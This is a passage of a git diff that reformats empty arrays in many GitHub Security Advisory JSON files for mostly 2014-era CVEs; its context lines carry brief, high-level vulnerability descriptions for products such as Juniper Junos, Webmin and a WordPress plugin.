diff --git a/advisories/unreviewed/2022/05/GHSA-mmg7-f7m8-xp3m/GHSA-mmg7-f7m8-xp3m.json b/advisories/unreviewed/2022/05/GHSA-mmg7-f7m8-xp3m/GHSA-mmg7-f7m8-xp3m.json
index 4ea74b0857b..2dd93d3033c 100644
--- a/advisories/unreviewed/2022/05/GHSA-mmg7-f7m8-xp3m/GHSA-mmg7-f7m8-xp3m.json
+++ b/advisories/unreviewed/2022/05/GHSA-mmg7-f7m8-xp3m/GHSA-mmg7-f7m8-xp3m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mmx7-9c9c-w6wv/GHSA-mmx7-9c9c-w6wv.json b/advisories/unreviewed/2022/05/GHSA-mmx7-9c9c-w6wv/GHSA-mmx7-9c9c-w6wv.json
index 1328b7b34fc..93f9c619081 100644
--- a/advisories/unreviewed/2022/05/GHSA-mmx7-9c9c-w6wv/GHSA-mmx7-9c9c-w6wv.json
+++ b/advisories/unreviewed/2022/05/GHSA-mmx7-9c9c-w6wv/GHSA-mmx7-9c9c-w6wv.json
@@ -7,12 +7,8 @@
"CVE-2014-2381"
],
"details": "Schneider Electric Wonderware Information Server (WIS) Portal 4.0 SP1 through 5.5 uses weak encryption, which allows local users to obtain sensitive information by reading a credential file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mpgp-3x73-94w5/GHSA-mpgp-3x73-94w5.json b/advisories/unreviewed/2022/05/GHSA-mpgp-3x73-94w5/GHSA-mpgp-3x73-94w5.json
index 162d09b4787..5ada93b32f6 100644
--- a/advisories/unreviewed/2022/05/GHSA-mpgp-3x73-94w5/GHSA-mpgp-3x73-94w5.json
+++ b/advisories/unreviewed/2022/05/GHSA-mpgp-3x73-94w5/GHSA-mpgp-3x73-94w5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mpvh-x69f-84mv/GHSA-mpvh-x69f-84mv.json b/advisories/unreviewed/2022/05/GHSA-mpvh-x69f-84mv/GHSA-mpvh-x69f-84mv.json
index af7c6946bf4..39b44da337f 100644
--- a/advisories/unreviewed/2022/05/GHSA-mpvh-x69f-84mv/GHSA-mpvh-x69f-84mv.json
+++ b/advisories/unreviewed/2022/05/GHSA-mpvh-x69f-84mv/GHSA-mpvh-x69f-84mv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mq6x-qhcj-q6rv/GHSA-mq6x-qhcj-q6rv.json b/advisories/unreviewed/2022/05/GHSA-mq6x-qhcj-q6rv/GHSA-mq6x-qhcj-q6rv.json
index d028dc3529e..082b1c3c7c2 100644
--- a/advisories/unreviewed/2022/05/GHSA-mq6x-qhcj-q6rv/GHSA-mq6x-qhcj-q6rv.json
+++ b/advisories/unreviewed/2022/05/GHSA-mq6x-qhcj-q6rv/GHSA-mq6x-qhcj-q6rv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
index 4edcbdfca52..8bdaa9b0be7 100644
--- a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
+++ b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-p29h-w5x5-227p/GHSA-p29h-w5x5-227p.json b/advisories/unreviewed/2022/05/GHSA-p29h-w5x5-227p/GHSA-p29h-w5x5-227p.json
index f007b02db4b..266c33da2e7 100644
--- a/advisories/unreviewed/2022/05/GHSA-p29h-w5x5-227p/GHSA-p29h-w5x5-227p.json
+++ b/advisories/unreviewed/2022/05/GHSA-p29h-w5x5-227p/GHSA-p29h-w5x5-227p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-p38w-mpxw-9mmr/GHSA-p38w-mpxw-9mmr.json b/advisories/unreviewed/2022/05/GHSA-p38w-mpxw-9mmr/GHSA-p38w-mpxw-9mmr.json
index 3b145a9cbd6..9677e3ec0b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-p38w-mpxw-9mmr/GHSA-p38w-mpxw-9mmr.json
+++ b/advisories/unreviewed/2022/05/GHSA-p38w-mpxw-9mmr/GHSA-p38w-mpxw-9mmr.json
@@ -7,12 +7,8 @@
"CVE-2014-3819"
],
"details": "Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-p3rw-869q-ccjh/GHSA-p3rw-869q-ccjh.json b/advisories/unreviewed/2022/05/GHSA-p3rw-869q-ccjh/GHSA-p3rw-869q-ccjh.json
index 4b4e2f9164e..ae594e74080 100644
--- a/advisories/unreviewed/2022/05/GHSA-p3rw-869q-ccjh/GHSA-p3rw-869q-ccjh.json
+++ b/advisories/unreviewed/2022/05/GHSA-p3rw-869q-ccjh/GHSA-p3rw-869q-ccjh.json
@@ -7,12 +7,8 @@
"CVE-2014-2956"
],
"details": "ScriptHelperApi in the AVG ScriptHelper ActiveX control in ScriptHelper.exe in AVG Secure Search toolbar before 18.1.7.598 and AVG Safeguard before 18.1.7.644 does not implement domain-based access control for method calls, which allows remote attackers to trigger the downloading and execution of arbitrary programs via a crafted web site.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-p4h7-mjq9-xwq7/GHSA-p4h7-mjq9-xwq7.json b/advisories/unreviewed/2022/05/GHSA-p4h7-mjq9-xwq7/GHSA-p4h7-mjq9-xwq7.json
index 6ba87aef937..c57171af8ae 100644
--- a/advisories/unreviewed/2022/05/GHSA-p4h7-mjq9-xwq7/GHSA-p4h7-mjq9-xwq7.json
+++ b/advisories/unreviewed/2022/05/GHSA-p4h7-mjq9-xwq7/GHSA-p4h7-mjq9-xwq7.json
@@ -7,12 +7,8 @@
"CVE-2014-2356"
],
"details": "Innominate mGuard before 7.6.4 and 8.x before 8.0.3 does not require authentication for snapshot downloads, which allows remote attackers to obtain sensitive information via a crafted HTTPS request.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-p6w4-r2qv-79v8/GHSA-p6w4-r2qv-79v8.json b/advisories/unreviewed/2022/05/GHSA-p6w4-r2qv-79v8/GHSA-p6w4-r2qv-79v8.json
index 89ef7934913..30b899ae4b3 100644
--- a/advisories/unreviewed/2022/05/GHSA-p6w4-r2qv-79v8/GHSA-p6w4-r2qv-79v8.json
+++ b/advisories/unreviewed/2022/05/GHSA-p6w4-r2qv-79v8/GHSA-p6w4-r2qv-79v8.json
@@ -7,12 +7,8 @@
"CVE-2014-1999"
],
"details": "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-p9jr-2p44-p728/GHSA-p9jr-2p44-p728.json b/advisories/unreviewed/2022/05/GHSA-p9jr-2p44-p728/GHSA-p9jr-2p44-p728.json
index e2e84a1ad67..9348ae875b6 100644
--- a/advisories/unreviewed/2022/05/GHSA-p9jr-2p44-p728/GHSA-p9jr-2p44-p728.json
+++ b/advisories/unreviewed/2022/05/GHSA-p9jr-2p44-p728/GHSA-p9jr-2p44-p728.json
@@ -7,12 +7,8 @@
"CVE-2014-0180"
],
"details": "The wait_for_task function in app/controllers/application_controller.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-pc95-cg7j-r7v3/GHSA-pc95-cg7j-r7v3.json b/advisories/unreviewed/2022/05/GHSA-pc95-cg7j-r7v3/GHSA-pc95-cg7j-r7v3.json
index a6eb0ea9603..89845b56bc6 100644
--- a/advisories/unreviewed/2022/05/GHSA-pc95-cg7j-r7v3/GHSA-pc95-cg7j-r7v3.json
+++ b/advisories/unreviewed/2022/05/GHSA-pc95-cg7j-r7v3/GHSA-pc95-cg7j-r7v3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pf2w-6prg-46hf/GHSA-pf2w-6prg-46hf.json b/advisories/unreviewed/2022/05/GHSA-pf2w-6prg-46hf/GHSA-pf2w-6prg-46hf.json
index 4687e5296a0..1da173dc524 100644
--- a/advisories/unreviewed/2022/05/GHSA-pf2w-6prg-46hf/GHSA-pf2w-6prg-46hf.json
+++ b/advisories/unreviewed/2022/05/GHSA-pf2w-6prg-46hf/GHSA-pf2w-6prg-46hf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pf66-8v2r-m3jq/GHSA-pf66-8v2r-m3jq.json b/advisories/unreviewed/2022/05/GHSA-pf66-8v2r-m3jq/GHSA-pf66-8v2r-m3jq.json
index 4837404a671..4709310d6c3 100644
--- a/advisories/unreviewed/2022/05/GHSA-pf66-8v2r-m3jq/GHSA-pf66-8v2r-m3jq.json
+++ b/advisories/unreviewed/2022/05/GHSA-pf66-8v2r-m3jq/GHSA-pf66-8v2r-m3jq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
index a02d302c51f..84fe542cd0b 100644
--- a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
+++ b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pmwp-2wf7-55xg/GHSA-pmwp-2wf7-55xg.json b/advisories/unreviewed/2022/05/GHSA-pmwp-2wf7-55xg/GHSA-pmwp-2wf7-55xg.json
index 629c44b2e6d..3a947bb1646 100644
--- a/advisories/unreviewed/2022/05/GHSA-pmwp-2wf7-55xg/GHSA-pmwp-2wf7-55xg.json
+++ b/advisories/unreviewed/2022/05/GHSA-pmwp-2wf7-55xg/GHSA-pmwp-2wf7-55xg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pqq9-w6j3-48ph/GHSA-pqq9-w6j3-48ph.json b/advisories/unreviewed/2022/05/GHSA-pqq9-w6j3-48ph/GHSA-pqq9-w6j3-48ph.json
index de156d06268..4a093f38534 100644
--- a/advisories/unreviewed/2022/05/GHSA-pqq9-w6j3-48ph/GHSA-pqq9-w6j3-48ph.json
+++ b/advisories/unreviewed/2022/05/GHSA-pqq9-w6j3-48ph/GHSA-pqq9-w6j3-48ph.json
@@ -7,12 +7,8 @@
"CVE-2014-3924"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Webmin before 1.690 and Usermin before 1.600 allow remote attackers to inject arbitrary web script or HTML via vectors related to popup windows.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pv3m-j6rc-qgg4/GHSA-pv3m-j6rc-qgg4.json b/advisories/unreviewed/2022/05/GHSA-pv3m-j6rc-qgg4/GHSA-pv3m-j6rc-qgg4.json
index a9e4b0c33bf..49aab6bd5c9 100644
--- a/advisories/unreviewed/2022/05/GHSA-pv3m-j6rc-qgg4/GHSA-pv3m-j6rc-qgg4.json
+++ b/advisories/unreviewed/2022/05/GHSA-pv3m-j6rc-qgg4/GHSA-pv3m-j6rc-qgg4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pvg8-cr5c-f868/GHSA-pvg8-cr5c-f868.json b/advisories/unreviewed/2022/05/GHSA-pvg8-cr5c-f868/GHSA-pvg8-cr5c-f868.json
index 9dceb822611..e2f64ad1527 100644
--- a/advisories/unreviewed/2022/05/GHSA-pvg8-cr5c-f868/GHSA-pvg8-cr5c-f868.json
+++ b/advisories/unreviewed/2022/05/GHSA-pvg8-cr5c-f868/GHSA-pvg8-cr5c-f868.json
@@ -7,12 +7,8 @@
"CVE-2014-4505"
],
"details": "Cross-site scripting (XSS) vulnerability in the Easy Breadcrumb module 7.x-2.x before 7.x-2.10 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pw6h-qmvr-5f3p/GHSA-pw6h-qmvr-5f3p.json b/advisories/unreviewed/2022/05/GHSA-pw6h-qmvr-5f3p/GHSA-pw6h-qmvr-5f3p.json
index 9958c78f01d..abcfe4ed7f5 100644
--- a/advisories/unreviewed/2022/05/GHSA-pw6h-qmvr-5f3p/GHSA-pw6h-qmvr-5f3p.json
+++ b/advisories/unreviewed/2022/05/GHSA-pw6h-qmvr-5f3p/GHSA-pw6h-qmvr-5f3p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-pw9g-5mm4-5mpm/GHSA-pw9g-5mm4-5mpm.json b/advisories/unreviewed/2022/05/GHSA-pw9g-5mm4-5mpm/GHSA-pw9g-5mm4-5mpm.json
index 0b85f7f07f1..1a85e46dec8 100644
--- a/advisories/unreviewed/2022/05/GHSA-pw9g-5mm4-5mpm/GHSA-pw9g-5mm4-5mpm.json
+++ b/advisories/unreviewed/2022/05/GHSA-pw9g-5mm4-5mpm/GHSA-pw9g-5mm4-5mpm.json
@@ -7,12 +7,8 @@
"CVE-2013-5740"
],
"details": "Unspecified vulnerability in the Intel Trusted Execution Technology (TXT) SINIT Authenticated Code Modules (ACM) before 1.2, as used by the Intel QM77, QS77, Q77 Express, C216, Q67 Express, C202, C204, and C206 chipsets and Mobile Intel QM67 and QS67 chipsets, when the measured launch environment (MLE) is invoked, allows local users to bypass the Trusted Execution Technology protection mechanism and perform other unspecified SINIT ACM functions via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-pwvf-w726-84cx/GHSA-pwvf-w726-84cx.json b/advisories/unreviewed/2022/05/GHSA-pwvf-w726-84cx/GHSA-pwvf-w726-84cx.json
index 08327f5b5ae..ce13b37037c 100644
--- a/advisories/unreviewed/2022/05/GHSA-pwvf-w726-84cx/GHSA-pwvf-w726-84cx.json
+++ b/advisories/unreviewed/2022/05/GHSA-pwvf-w726-84cx/GHSA-pwvf-w726-84cx.json
@@ -7,12 +7,8 @@
"CVE-2014-4938"
],
"details": "SQL injection vulnerability in the WP Rss Poster (wp-rss-poster) plugin 1.0.0 for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter in the wrp-add-new page to wp-admin/admin.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q2x9-7c5q-96xp/GHSA-q2x9-7c5q-96xp.json b/advisories/unreviewed/2022/05/GHSA-q2x9-7c5q-96xp/GHSA-q2x9-7c5q-96xp.json
index d9079fc2194..b4845109e45 100644
--- a/advisories/unreviewed/2022/05/GHSA-q2x9-7c5q-96xp/GHSA-q2x9-7c5q-96xp.json
+++ b/advisories/unreviewed/2022/05/GHSA-q2x9-7c5q-96xp/GHSA-q2x9-7c5q-96xp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q39j-xwr5-2ggj/GHSA-q39j-xwr5-2ggj.json b/advisories/unreviewed/2022/05/GHSA-q39j-xwr5-2ggj/GHSA-q39j-xwr5-2ggj.json
index bae2f0b3090..dc3f056e8b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-q39j-xwr5-2ggj/GHSA-q39j-xwr5-2ggj.json
+++ b/advisories/unreviewed/2022/05/GHSA-q39j-xwr5-2ggj/GHSA-q39j-xwr5-2ggj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q3r7-343c-xpjw/GHSA-q3r7-343c-xpjw.json b/advisories/unreviewed/2022/05/GHSA-q3r7-343c-xpjw/GHSA-q3r7-343c-xpjw.json
index 4137bac0860..f037e2beaee 100644
--- a/advisories/unreviewed/2022/05/GHSA-q3r7-343c-xpjw/GHSA-q3r7-343c-xpjw.json
+++ b/advisories/unreviewed/2022/05/GHSA-q3r7-343c-xpjw/GHSA-q3r7-343c-xpjw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q3x4-2743-52q4/GHSA-q3x4-2743-52q4.json b/advisories/unreviewed/2022/05/GHSA-q3x4-2743-52q4/GHSA-q3x4-2743-52q4.json
index 2462bdbd7f4..20f559421aa 100644
--- a/advisories/unreviewed/2022/05/GHSA-q3x4-2743-52q4/GHSA-q3x4-2743-52q4.json
+++ b/advisories/unreviewed/2022/05/GHSA-q3x4-2743-52q4/GHSA-q3x4-2743-52q4.json
@@ -7,12 +7,8 @@
"CVE-2014-3821"
],
"details": "Cross-site scripting (XSS) vulnerability in SRX Web Authentication (webauth) in Juniper Junos 11.4 before 11.4R11, 12.1X44 before 12.1X44-D34, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, and 12.1X47 before 12.1X47-D10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q4qr-976g-hx68/GHSA-q4qr-976g-hx68.json b/advisories/unreviewed/2022/05/GHSA-q4qr-976g-hx68/GHSA-q4qr-976g-hx68.json
index 5de4b1755f4..141bc76b583 100644
--- a/advisories/unreviewed/2022/05/GHSA-q4qr-976g-hx68/GHSA-q4qr-976g-hx68.json
+++ b/advisories/unreviewed/2022/05/GHSA-q4qr-976g-hx68/GHSA-q4qr-976g-hx68.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-q569-xrrr-6gvr/GHSA-q569-xrrr-6gvr.json b/advisories/unreviewed/2022/05/GHSA-q569-xrrr-6gvr/GHSA-q569-xrrr-6gvr.json
index 1345cf9a72c..f393f92dd2d 100644
--- a/advisories/unreviewed/2022/05/GHSA-q569-xrrr-6gvr/GHSA-q569-xrrr-6gvr.json
+++ b/advisories/unreviewed/2022/05/GHSA-q569-xrrr-6gvr/GHSA-q569-xrrr-6gvr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q7mp-5vcp-224m/GHSA-q7mp-5vcp-224m.json b/advisories/unreviewed/2022/05/GHSA-q7mp-5vcp-224m/GHSA-q7mp-5vcp-224m.json
index 152ce1203ec..5fc4816374b 100644
--- a/advisories/unreviewed/2022/05/GHSA-q7mp-5vcp-224m/GHSA-q7mp-5vcp-224m.json
+++ b/advisories/unreviewed/2022/05/GHSA-q7mp-5vcp-224m/GHSA-q7mp-5vcp-224m.json
@@ -7,12 +7,8 @@
"CVE-2014-4853"
],
"details": "Cross-site scripting (XSS) vulnerability in odm-init.php in OpenDocMan before 1.2.7.3 allows remote authenticated users to inject arbitrary web script or HTML via the file name of an uploaded file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-q9m6-5cw7-gv47/GHSA-q9m6-5cw7-gv47.json b/advisories/unreviewed/2022/05/GHSA-q9m6-5cw7-gv47/GHSA-q9m6-5cw7-gv47.json
index f4a01843fb9..907ec743093 100644
--- a/advisories/unreviewed/2022/05/GHSA-q9m6-5cw7-gv47/GHSA-q9m6-5cw7-gv47.json
+++ b/advisories/unreviewed/2022/05/GHSA-q9m6-5cw7-gv47/GHSA-q9m6-5cw7-gv47.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qh6g-57jp-q5w8/GHSA-qh6g-57jp-q5w8.json b/advisories/unreviewed/2022/05/GHSA-qh6g-57jp-q5w8/GHSA-qh6g-57jp-q5w8.json
index 850b216bef4..4fdaa50669b 100644
--- a/advisories/unreviewed/2022/05/GHSA-qh6g-57jp-q5w8/GHSA-qh6g-57jp-q5w8.json
+++ b/advisories/unreviewed/2022/05/GHSA-qh6g-57jp-q5w8/GHSA-qh6g-57jp-q5w8.json
@@ -7,12 +7,8 @@
"CVE-2014-3822"
],
"details": "Juniper Junos 11.4 before 11.4R8, 12.1 before 12.1R5, 12.1X44 before 12.1X44-D20, 12.1X45 before 12.1X45-D15, 12.1X46 before 12.1X46-D10, and 12.1X47 before 12.1X47-D10 on SRX Series devices, allows remote attackers to cause a denial of service (flowd crash) via a malformed packet, related to translating IPv6 to IPv4.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qh7x-pw74-r2q6/GHSA-qh7x-pw74-r2q6.json b/advisories/unreviewed/2022/05/GHSA-qh7x-pw74-r2q6/GHSA-qh7x-pw74-r2q6.json
index ffa724c4e68..6e44a13a0ff 100644
--- a/advisories/unreviewed/2022/05/GHSA-qh7x-pw74-r2q6/GHSA-qh7x-pw74-r2q6.json
+++ b/advisories/unreviewed/2022/05/GHSA-qh7x-pw74-r2q6/GHSA-qh7x-pw74-r2q6.json
@@ -7,12 +7,8 @@
"CVE-2014-4155"
],
"details": "Cross-site request forgery (CSRF) vulnerability in the ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK allows remote attackers to hijack the authentication of administrators for requests that change the admin password via a request to Forms/tools_admin_1.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qhp6-8wqm-w5mj/GHSA-qhp6-8wqm-w5mj.json b/advisories/unreviewed/2022/05/GHSA-qhp6-8wqm-w5mj/GHSA-qhp6-8wqm-w5mj.json
index 6ac858d58e0..62e93432978 100644
--- a/advisories/unreviewed/2022/05/GHSA-qhp6-8wqm-w5mj/GHSA-qhp6-8wqm-w5mj.json
+++ b/advisories/unreviewed/2022/05/GHSA-qhp6-8wqm-w5mj/GHSA-qhp6-8wqm-w5mj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
index 8194ccd5cc2..890fff4c35c 100644
--- a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
+++ b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
@@ -7,12 +7,8 @@
"CVE-2008-0379"
],
